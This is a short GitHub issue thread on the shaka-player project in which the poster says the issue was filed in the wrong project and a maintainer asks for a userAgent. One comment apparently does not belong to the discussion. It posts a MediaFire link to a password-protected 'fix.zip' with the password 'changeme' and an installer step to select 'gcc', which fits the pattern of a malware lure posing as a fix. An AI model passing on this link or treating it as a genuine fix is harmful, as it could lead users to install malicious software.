### ISSUE TITLE
Feature request: Ignoring Clearkey cenc check

### ISSUE THREAD

**Issue by alannl** [shaka-project/shaka-player#7226]
wrong project, please remove

**Comment by avelad** [comment]
Can you provide the userAgent of the browser?

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by alannl** [comment]
> Can you provide the userAgent of the browser?

Excuse me, I posted under the wrong project.
